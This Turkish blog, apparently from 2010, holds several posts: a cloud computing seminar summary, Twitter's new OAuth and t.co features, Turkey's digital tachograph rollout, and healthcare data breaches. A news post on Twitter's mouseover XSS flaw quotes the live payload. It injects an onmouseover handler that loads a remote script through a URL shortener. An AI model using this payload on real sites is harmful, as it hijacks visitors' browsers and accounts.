Ve sahneye Cisco çıkıyor. Cisco’nun Cloud Computing tanımı ise oldukça başarılı: ” Anywhere, Anyone, Any Service” – “Herhangi bir yerde, herhangi biri, herhangi bir servis”. Cisco’ya göre Cloud’a geçiş’in nedenleri 3 aşamada sıralanıyor: Higher cost of ownership, Silo resource pools, Longer provisioning time. Cloud Sistemlere geçiş ile birlikte özellikle SMB şirketlerinin avantaja sahip olacağı vurgulanıyor. SMB’ler özellikle, klasik IT çözümlerine alternatif olarak ucuz ve etkin Cloud çözümlerini seçecekler.

Biraz da Cloud Service’lerin çeşitliliklerinden bahsedelim:

Software-as-a-service (SaaS)
Önceden ayarlanmış ve web-browser’larımızdan kolayca eriştiğimiz servisler olarak tanımlayabiliriz. Tüketiciler ve iş çözümleri olarak herkes tarafından kullanabilecek olan servisler. WebEx, Google Apps, salesforce.com u örnek olarak gösterebiliriz.

Platform-as-a-service (PaaS)
Platform geliştirmek için tasarlanan bu sistemle birlikte, geliştiriciler kendi uygulamalarını ya da ara-yazılım olarak tanımlanan middleware’lerini geliştirebiliyor. Bu servislere örnek olarak Google AppEngine ve MS Azure Service sistemlerini gösterebiliriz.

Infrastructure-as-a-service (IaaS) Sanal Sunucular ve IT,  internal cloud ya da servis sağlayıcılar olarak tanımlanabilir. Yabancıların pay-as-you-go olarak tanımladığı servisler olarak ta adlandırabiliriz. Amazon Elastic Compute – EC2 @ S3, Terramark, Google Base gibi hizmetler örnek olarak gösterilebilir.

Amerika’da devler kuruluşu olan NIST’in Cloud Computing Tanımı ise 3 aşamadan oluşuyor. Ayrıntılarına fazla girmeyeceğim, detaylı bilgi için ilgili dökümana gözatabilirsiniz

  • Essential Characteristics
  • Service Models
  • Deployment Models

Evet genel olarak firmaların Bulut Bilişim’den beklentileri, öngörüleri bu şekilde sıralanıyor. Şimdi biraz da, olabilecek sıkıntılardan bahsedelim:

Cloud yapısının henüz hala gelişme aşamasında olduğuna değinmemiz gerekiyor. Her firmanın bakış açısı, çözümleri, üzerinde durduğu ve yoğunlaştığı farklı alanlar var. Bu nedenle açıklamalar, kullanım alanları, teknolojiler, riskler, sorunlar ve yararlar hala tam olarak belirlenebilmiş ve standart olarak tanımlanabilmiş değil. Gelişme aşamasında olduğu için zaman içinde terimler daha net bir biçimde ortaya konacaktır.

Tüm bu bilgiler ve kavramlar doğrultusunda, ortaya çıkabilecek en büyük engellerin başında; Güvenlik, Kontrol, Uygunluluk (Regülasyon) ve Kalite’nin yanında SLA’ler bulunuyor.

Seminer’den aktaracaklarım ve kendi bilgilerimle harmanladığım yazının sonuna gelirken, Cloud Computing kavramının hala emekleme aşamasında olduğunu ancak ciddi bir ivmelenme ile günümüz teknolojilerine aktarılmaya başlandığını hatırlatmak gerek. 2 önceki paragrafta da belirttiğim gibi, yapı hala gelişme yani evrim aşamasında. Evrim tamamlandığında ise, ortaya ciddi bir oluşum çıkacak. Ben özellikle artık evlerdeki PC kavramının tarihe karışacağını ve tüm yapıların sunucu sistemlerine geçeceğini düşünüyorum. Ancak kontrolün bizde olmadığı bir teknolojiden de oldukça çekindiğimi belirtmeden edemeyeceğim:

Peki, Geleceğin Kontrolü kimde olacak?


Tags: , , , , , ,

Twitter’ın mouseover java script açığı, tüm kullanıcıları etkiledi

September 21st, 2010 | No Comments | Posted in Exploit, Vulnerability

Bugün gerçekleşen bir güvenlik açığı, tüm twitter kullanıcılarını etkisi altına aldı. Twitter hesaplarını web üzerinden kullanan kullanıcıları etkisi altına alan bu kod açıklığı, listenizdeki kullanıcıların tweet’lerine yansıyan arka planı ve yazıtipi siyah bir şekilde karşımıza çıktı. Siz fare imlecinizi bu tweet’in üzerine getirir getirmez, otomatik olarak RT yani Re-tweet yapmanızı sağlayan ilgili açıklık, yine web tarayıcınıza twitter’dan kaynaklı olarak değişik hata mesajı içerikleriyle karşılandı. İçeriği aşağıdaki şekilde olan açıklığın, ekran görüntüsüne de aşağıdan ulaşabilirsiniz:

http://t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7′)”/

Twitter Fail

http://yfrog.com/mqdirdp

Sorunun şimdilik giderilmesi için mobile.tweeter.com sitesi önerilirken, tweetdeck gibi 3rd yazılımların da, sorundan etkilenmediğini belirtmem gerekiyor. Resmi bir açıklama yapmayan twitter, benzer durumlarda kullandığı twitter hesabından kullandığı status raporlarından konunun XSS attack ‘a bağlı olarak açıklıktan faydalanıldığını ve kısa sürede giderileceğini haber vermiş.

Tags: , , , , , , , ,

twitter’ın sunduğu yeni özellikler

September 20th, 2010 | No Comments | Posted in Mobile

Micro-blogging kavramı blog yazmayı arka planda bıraksa da, blog’lara eklenen bu ara uygulamalar ile twitter gibi anlık iletilerinizi girebileceğiniz bu platformlarınıza doping yapmanız mümkün.

İnternet’in tartışmasız en popüler sosyal paylaşım /micro-blogging sitesi olan twitter, yakın bir süre içinde yeni arayüzüne kavuşacak. Bu konuda yaptıkları birkaç yenilik, bu sistemin yeni arayüzüne hazırlık olarak düşünülmüş olduğunun bir göstergesi diyebiliriz.

Geliştirilen pek çok uygulama, kendi platformlarını oluşturmak yerine twitter API’sini kullanarak direkt olarak twitter ile entegre çalışabiliyor. Dünya’da Twitter API’sini kullanan 250.000′in üzerinde uygulama olmasının yanında, bunların en popülerleri arasında masaüstü ve mobil olarak kullanabilen tweetdeck, web-sitesi olarak TweetMeme, tweeter’a özel iPhone ve Blackberry uygulamalarının yanında ayrıca çevrimiçi lokasyon bazlı Foursquare bulunuyor.

Yukarıda saydığım yeni twitter özelliklerinden ilki, bu uygulamaların twitter’a erişmesi için sağlanan “OAuth” erişimi. 31 Ağustos’tan itibaren kullanılmaya başlanan bu özellik ile;

  • Şifrenizi istemeden tamamen sizin onayınıza bağlı olarak uygulamaların twitter’ınıza erişim sağlanması
  • Masaüstü ve mobil uygulamalar şifrenizi istemeye devam edecek ancak OAuth kullanılacağı için sizin zaman diliminiz ya da isteğinize bağlı olarak tweetlenmesi

Peki bu özelliğin kullanıcılara ne gibi faydaları var?

  • OAuth ile uygulamalar şifrelerinizi kendi ortamlarında saklayamayacak
  • Şifrenizi değiştirseniz bile uygulamalar twitter hesabınıza erişmeye devam edebilecek
  • Bazı uygulamalar tekrardan onayınızı isteyebilir ya da tamemen kullanımı kısıtlayabilir. Bu kısıtlama konusunda özellikle iPhone ile kullandığım twitterrific uygulamasını örnek gösterebilirim. Bu nedenle artık tweetdeck kullanıyorum
  • Yetki verdiğiniz tüm uygulamalara, http://twitter.com/settings/connections adresinden bakabilirsiniz

Bir diğer özellik ise daha çok kontrol amaçlı olarak eklenmiş. Yeni eklenen t.co URL wrapping özelliği ile kısaltılmış URL’lerin kontrolü twitter tarafından sağlanarak, ilgili internet adreslerinin herhangi bir malware ya da phishing olma riskini ortadan kaldırarak, daha güvenli bir paylaşım ortamı sunuluyor.

Tüm bu eklenen özelliklere ek olarak, twitter’ın yakın zamanda tüm kullanıcılarına sunacağı yeni arayüz bilgilerine http://twitter.com/newtwitter adresinden erişebilirsiniz. Yeni arayüz ile eskiye oranla daha interaktif bir paylaşım platformu hedeflendiğini gözlemeyebilirsiniz.

Tags: , , , ,

Türkiye Avrupa Birliği kapsamında Dijital Takograf Sistemi’ne geçiyor

September 3rd, 2010 | No Comments | Posted in Authentication, Kimlik Yönetimi

Güvenlik hayat kalitemizi ve dolaylı olarak yaşam biçimimizi şekillendiren unsurlar arasında yer alırken, özellikle trafik güvenliği birçok alanda daha önemli bir rol oynuyor. Bu kapsamda Avrupa Birliği kapsamında yer alan 3821/85/AET tüzük gereğince, diğer ülkelerde kullanılmaya başlanan Dijital Takograf Sistemi, Türkiye için 2010 senesi itibariyle yürürlüğe giriyor. Bu uyum süreci en basit ve genel anlamda 3821/85/AET ve 561/2006/AET sayılı tüzükler doğrultusunda, azami ağırlığı 3,5 tonu geçen bir araçla taşımacılık yapan her sürücünün, kayıt cihazı yani digital takograf kullanması zorunlu hale geliyor.

Aslında AB, 1 Mayıs 2006′dan itibaren, üye ülkelerdeki yeni araçlarda sayısal (dijital) takograf kullanılmasını zorunla hale getirdi. Uyum süresince büyük ihtimalle bürokrotik işlemlere mağruz kalan bu uygulama, ülkemizde sene sonuna doğru faaliyete geçmesi bekleniyor.

Peki bu uygulama sisteme ne gibi yararlar sağlıyor?

  • Yeni araçların plaka gibi tanım bilgilerinin yetkili servisler tarafından digital takografa işlenmiş olması gerekiyor
  • Şoför kartı verilerinin en geç her 28 günde bir elektronik olarak indirilmesi ve arşivlenmesi gerekiyor
  • Araç verilerinin en geç her 3 ayda bir elektronik olarak indirilmesi ve arşivlenmesi gerekiyor
  • Firmanın nakliye sorumlusunun bu bilgileri düzenli olarak takip ederek sürüş saatlerinin ve diğer tüm bilgilerin doğruluğu ve sağlamlığından emin olması, ihlal durumlarında sürücüyü bilgilendirerek uyarması gerekiyor
  • Verinin güvenliğinin sağlanması amacıyla verilerin düzenli olarak arşivlenerek yedeklenmesi gerekiyor
  • Gerekli olduğunda incelenebilmesi amacıyla, tüm sürücü ve araç bilgilerinin en az 1 yıl süre ile araç dışında elektronik olarak saklanması ve arşivlenmesi gerekiyor

Maddelerin bazılarından görebileceğiniz gibi, tüm kayıtlar analog yerine dijital ortamlarda saklanıyor. Böylece şöförlerin ilgili takograflara herhangi bir şekilde müdahalesi mümkün olmuyor ve araçların yaptıkları km’lerden tutun da, ne zaman ve nerede mola verdiklerine kadar pekçok bilgi, şöförlere özel olarak sağlanan bu dijital kartlarda saklanıyor. Türkiye’de ortalama 500.000 adet taşımacılık yapan araç olduğu düşünüldüğünde, dijital takograf kullanımı konusunda ciddi bir eğitime ve uyum sürecine ihtiyaç olduğu açıkça görülüyor.

Güvenlik anlamında dijital sertifikasyon süreçleri yine adını vermeyeceğim bazı HSM ‘lerle sağlanıyor. AB’nin Root CA’nin yanında her ülkenin gerekli şartlar ve kurallar doğrultusunda oluşturulan Sub-CA dediğimiz, o ülkeye ait bir Sub-Root CA bulunuyor ve tüm şöförlere dağıtlacak olan kartlarda yer alan dijital sertifikalar bu CA ile oluşturuluyor. Eğer sistemi teknik olarak incelemek isterseniz ilgili tüm şartlara Digital Tachograph SystemEuropean Root Policy dökümanından ulaşabilirsiniz.

Proje başarılı bir şekilde oluşturuldu ve hayata geçmek üzere.  Türkiye ve taşımacılık sektörü adına sağlıklı ve ileriye dönük olarak başarılı bir proje olacağına gönülden inanıyorum.

Tags: , , ,

Sağlık sektöründeki zafiyet, Finans sektörünü geçiyor mu?

Bilgi Güvenliği sektöründe son zamanlarda artan bir trend olarak karşımıza çıkan Identity Theft ve Data Breach, yani kimlik hırsızlığı ve veri ihlalleri ciddi bir sorun teşkil etmeye başladı. Son zamanlarda ülkemizde de sıklıkla duyduğumuz T.C. Kimlik Numaraları, Tapu Kadastro Kayıtları gibi çeşitli bilgilerinin çalınması; kurumlarda ciddi bir regulasyon eksiğinin ve sosyal mühendislik gibi kavramların tam oturmayaşından kaynaklıdır.

Identity Theft Resource Center’ın 2010 yılı için oluşturduğu veri ihlal kayıt PDF raporlarına bu adresten ulaşabilirsiniz. Rapora göre şimdiye kadar 435 farklı ihlalden etkilenen farklı kayıt sayısının 13 milyon olduğu düşünülüyor.

Sağlık sektörü de üzerinde durulması gereken vertical market’lerden bir tanesi. Her ne kadar ülkemizde herhangi bir yaptırım söz konusu olmasa da, özellikle Amerika’da uygulanan HIPAA (Health Insurance Portability and Accountability Act ) kanunları bir takım yaptırımları da beraberinde getiriyor. Bu kanunlar kabaca, hastaların ya da sağlık sigortası olan her kişi kayıtlarının gizliliğini, güvenliğini ve olası elektronik data transferlerindeki bilgi korunumunu içeriyor. Bu tarz regulasyonlar özellikle dosya, uygulama ve database gibi ortamlarda saklanan veriler için geçerli kurallar bütünlüğünü oluşturuyor. Saklanan verilerin bütününü ele aldığımızda; sosyal sigorta numaralarınızdan, geçirdiğiniz tüm hastalıklar, raporlar, tahliller, adres ve telefon bilgilerinize kadar herhangi bir veri yeralabilir. Hayatımızın yavaş yavaş Internet’e geçtiği bu dönemde, bazı hastanelerin sağlık bilgilerini internet üzerinden paylaşması, akıllara bazı soru  işaretlerini de beraberinde getiriyor.

İşte bu noktada Amerikan Hükümetinin her ne kadar ciddi yaptırımları olsa da; 2010 yılı için açıklanan zafiyet raporlarında bankacılık sektörünü (39) 3 kat fazla fraud (119) ile geride bırakmaya başaran sağlık sektörü, ciddi bir emekleme dönemine girmiş gözüküyor.

Sağlık sektöründen örneklere gelince;

  • Geçtiğimiz aylarda California eyaletinde gerçekleşen açıklıklar, 5 farklı hastanenin toplamda 675.000 dolar ceza ödemesine sebebiyet verdi
  • Louisville Üniversite hastanesinin şifrelenmemiş web-sitesinden çalınan 700 hasta kaydı
  • Yine California’da gerçekleşen Kaiser Permanente kurumunda çalışan bir kişinin arabasından çalınan depolama biriminde yer alan 15.000 hastanın kaydı, ciddi endişelere yol açtı
  • Kentucky Üniversite hastanesinin kilitli ofisinden çalınan dizüstü bilgisayarda yer alan 2.027 kişinin bilgileri yine ciddi bir güvenlik açığına sebep oldu

Örnekleri çoğaltmak mümkün. Özellikle ülkemizde bir türlü uygulanamayan sağlık sektöründeki regulasyon açıklığı, benim fikrime göre hastanelerden çok sigorta şirketlerinin gerekli önlemleri almalarını gerektiriyor. Çünkü buradaki güç ve yaptırım sigorta şirketlerinden gelmesinin yanında,  genel yapıya ve şablona baktığımızda yine sigorta şirketlerinin hastalarla olan ilişkisi ön plana çıkıyor.

Tags: , , , , , , ,